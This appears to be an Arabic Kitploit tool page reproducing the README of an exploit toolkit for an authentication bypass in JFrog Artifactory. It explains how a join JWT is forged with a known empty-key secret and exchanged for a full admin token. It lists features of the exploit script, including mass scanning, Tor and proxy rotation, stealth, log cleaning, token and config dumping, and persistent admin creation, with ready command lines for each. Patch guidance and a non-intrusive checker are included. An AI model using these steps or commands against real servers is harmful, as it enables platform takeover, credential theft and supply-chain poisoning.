Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-82329-PoC-Exploit — مجموعة أدوات للاستغلال والكشف عن CVE-2026-82329، وهو تجاوز للمصادقة في JFrog Artifactory. تقوم بتزوير رموز JWT للانضمام لإصدار رموز المسؤول؛ وتتضمن أداة فحص إصدار غير تدخلية. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
أدوات دفاعيةماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالمحاكاة الافتراضية للأماناختبار الاختراقالمصادقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الفريق الأحمر
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

مجموعة أدوات للاستغلال والكشف عن CVE-2026-82329، وهو تجاوز للمصادقة في JFrog Artifactory. تقوم بتزوير رموز JWT للانضمام لإصدار رموز المسؤول؛ وتتضمن أداة فحص إصدار غير تدخلية.

عرض المستودع
3118منذ 21 أياملم تتم المراجعة بعد
مشاركة

CVEPoC

CVE‑2026‑82329 – مجموعة أدوات تجاوز المصادقة في JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات لمتخصصي الأمن المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑82329 هي ثغرة تجاوز مصادقة حرجة في JFrog Artifactory المستضاف ذاتيًا (الإصدارات 7.111.x حتى 7.161.x) تسمح لمهاجم غير مصادق عليه بالحصول على رمز مسؤول كامل للمنصة عبر استغلال آلية الانضمام إلى عنقود JFrog Access.

كيف تعمل

  1. الثقة بمفتاح انضمام فارغ – يثق JFrog Access بمفتاح انضمام وهمي قيمته سلسلة فارغة. وبالتالي فإن سر التوقيع الخاص به هو القيمة الحتمية 32 * 0x20 (مسافات).
  2. JWT انضمام مزور – يزور المهاجم JWT من نوع HS256 موقّعًا بهذا السر المعروف و kid = SHA256("").
  3. إصدار رمز SERVICE – يُرجع POST /access/api/v1/registry/join رمز SERVICE مع scp=admin دون أي مصادقة.
  4. تبادل رمز المسؤول – POST /access/api/v1/tokens مع scope=applied-permissions/admin&audience=* يمنح رمز مسؤول كامل للمنصة.
  5. التأثير – استيلاء كامل على المستودع، وسرقة الرموز، وإنشاء مستخدم مسؤول، وتسميم الحزم، وهجمات سلسلة التوريد، والتحرك الجانبي إلى الخدمات المتصلة (Xray، Mission Control، Distribution). قم بالترقية فورًا!

الإصدارات المتأثرة

  • 7.111.4 – 7.111.20 – معرّضة للثغرة
  • 7.117.0 – 7.117.27 – معرّضة للثغرة
  • 7.125.0 – 7.125.19 – معرّضة للثغرة
  • 7.133.0 – 7.133.28 – معرّضة للثغرة
  • 7.146.0 – 7.146.36 – معرّضة للثغرة
  • 7.161.0 – 7.161.19 – معرّضة للثغرة

الترقيع

  • قم بالترقية إلى 7.111.21، 7.117.28، 7.125.20، 7.133.29، 7.146.38، أو 7.161.20 أو أحدث.
  • إذا لم يكن الترقية ممكنة، قم بتقييد الوصول الشبكي إلى Artifactory (لا تعرضه أبدًا للإنترنت) وقم بتدوير جميع رموز المسؤول كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات مسلحة كاملة مع تزوير JWT، وتبادل رمز المسؤول، وإنشاء مستخدم مسؤول، والمسح الجماعي، ووضع التخفي، وتدوير الوكيل، وقائمة تفاعلية، وسلسلة هجوم كاملة.الفرق الحمراء / مختبري الاختراق المصرح لهم
safechecker.pyفاحص ثغرات غير تدخلي يكتشف إصدار Artifactory، ويتحقق من التعرض، ويقيّم المخاطر دون الحصول على أي رمز أو تنفيذ أي حمولة. يُنشئ تقارير JSON.الفرق الزرقاء / مدققو الأمن

📊 مقارنة الميزات

الميزةexploit.pysafechecker.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار✅✅
JWT انضمام مزور✅❌
إصدار رمز الخدمة✅❌
تبادل رمز المسؤول✅❌
إنشاء مستخدم مسؤول✅❌
سرد المستودعات✅❌
سرد المستخدمين✅❌
تفريغ الإعدادات✅❌
تفريغ الرموز✅❌
سلسلة هجوم كاملة✅❌
قائمة تفاعلية✅❌
المسح الجماعي (متعدد الخيوط)✅✅
دعم الوكيل✅✅
تدوير الوكيل✅❌
دعم Tor (إخفاء الهوية)✅❌
تدوير User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
محدد معدل تكيفي✅❌
وضع غير تدخلي (آمن)❌✅
تقرير الإصدار✅✅
فحص الوصول المجهول❌✅
تقرير JSON✅✅
تنظيف السجلات (مضاد للطب الشرعي)✅❌
User‑Agent مخصص✅✅
التحكم في التحقق من SSL✅✅

🎯 ملخص حالات الاستخدام

السيناريوالأداة الموصى بها
الفريق الأزرق – التحقق مما إذا كان Artifactory الخاص بك معرّضًا للثغرةsafechecker.py
التدقيق الأمني – تقييم ثغرات غير تدخليsafechecker.py
الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
Bug Bounty – اختبار الإفصاح المسؤولsafechecker.py
المسح الجماعي – فحص أهداف متعددة بحثًا عن الثغرةexploit.py (كشف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafechecker.py

⚙️ التثبيت

git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

requests
urllib3
curl_cffi

📋 المعاملات

معاملات exploit.py

المعاملالوصف
-u, --urlعنوان URL لهدف Artifactory واحد (مثال: http://artifactory.example.com:8082)
-f, --fileملف يحتوي على قائمة الأهداف (واحد في كل سطر) للمسح الجماعي
--create-adminإنشاء مستخدم مسؤول دائم (التنسيق: USER:PASS)
--keep-adminالاحتفاظ بمستخدم المسؤول المنشأ (عدم التنظيف بعد المسح)
--token-onlyطباعة رمز المسؤول فقط (هدف واحد)
--interactiveقائمة تفاعلية بعد الاستغلال
--service-idمعرف الخدمة لـ JWT الانضمام (افتراضي: jfrt@01)
-t, --threadsعدد الخيوط للأهداف المتعددة (افتراضي: 10)
--timeoutمهلة الطلب (افتراضي: 25 ثانية)
--retryالحد الأقصى لإعادة المحاولات (افتراضي: 3)
--proxyوكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080)
--proxy-listملف يحتوي على وكلاء للتدوير (واحد في كل سطر)
--jitterتأخير عشوائي (0‑2 ثانية) بين الطلبات
--stealthتمكين وضع التخفي (تدوير UA + X‑Forwarded‑For)
--curl-cffiاستخدام curl_cffi لانتحال بصمة TLS
--fullهجوم كامل: جميع الوحدات
--dump-configتفريغ إعدادات النظام
--dump-tokensتفريغ جميع رموز الوصول
--list-reposسرد المستودعات
--list-usersسرد المستخدمين
--detectالكشف فقط (بدون تبادل رمز المسؤول)
--exploitتنفيذ الاستغلال الكامل
-o, --outputحفظ تقرير JSON في ملف
-v, --verboseإخراج مطوّل
-q, --quietوضع صامت

معاملات safechecker.py

المعاملالوصف
-u, --urlعنوان URL لهدف Artifactory واحد (مثال: http://artifactory.example.com:8082)
-f, --fileملف يحتوي على قائمة الأهداف (واحد في كل سطر)
-t, --threadsعدد الخيوط للأهداف المتعددة (افتراضي: 5)
--timeoutمهلة الطلب (افتراضي: 10 ثوانٍ)
-v, --verboseإخراج مطوّل
-o, --outputحفظ تقرير JSON في ملف

💥 السيناريوهات

#السيناريوالأمر
1فحص سريع للثغرةpython safechecker.py -u http://artifactory.example.com:8082
2مسح مفصل مع تقريرpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3تدقيق جماعي من ملفpython safechecker.py -f targets.txt -t 10 -o audit.json
4استغلال كشف فقطpython exploit.py -u http://artifactory.example.com:8082 --detect
5الحصول على رمز المسؤول فقطpython exploit.py -u http://artifactory.example.com:8082 --token-only
6هجوم كامل مع قائمة تفاعليةpython exploit.py -u http://artifactory.example.com:8082 --interactive
7إنشاء مستخدم مسؤول دائمpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8تفريغ الإعداداتpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9سرد المستودعات والمستخدمينpython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10استغلال جماعي مع التخفيpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11تدوير الوكيل مع Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 سلسلة نقاط النهاية والاستغلال

تنزيل الأداة